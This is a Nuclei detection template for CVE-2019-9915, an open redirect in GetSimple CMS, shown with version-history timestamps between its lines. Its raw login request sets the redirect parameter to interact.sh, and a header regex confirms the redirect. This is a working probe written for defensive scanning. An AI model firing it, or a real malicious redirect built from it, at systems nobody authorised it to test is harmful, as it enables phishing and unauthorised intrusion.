2022-03-13 08:58:20 +00:00
id : CVE-2019-9915
info :
2022-10-19 21:11:27 +00:00
name : GetSimple CMS 3.3.13 - Open Redirect
2022-03-13 08:58:20 +00:00
author : 0x_Akoko
severity : medium
2022-10-19 21:11:27 +00:00
description : GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-03-13 08:58:20 +00:00
reference :
- https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
2022-03-14 19:17:46 +00:00
- https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
2022-03-13 08:58:20 +00:00
- https://www.cvedetails.com/cve/CVE-2019-9915
2022-08-01 05:44:32 +00:00
- https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-9915
2022-03-13 08:58:20 +00:00
classification :
2022-08-01 05:44:32 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-03-13 08:58:20 +00:00
cve-id : CVE-2019-9915
cwe-id : CWE-601
2022-07-29 19:15:59 +00:00
metadata :
2022-08-01 05:44:32 +00:00
verified : "true"
2022-07-29 19:15:59 +00:00
tags : cve,cve2019,redirect,getsimple,cms
2022-03-13 08:58:20 +00:00
requests :
2022-07-29 19:15:59 +00:00
- raw :
- |
POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
userid={{username}}&pwd={{password}}&submitted=Login
2022-03-13 08:58:20 +00:00
matchers :
- type : regex
part : header
2022-03-14 19:17:46 +00:00
regex :
2022-07-29 19:15:59 +00:00
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/13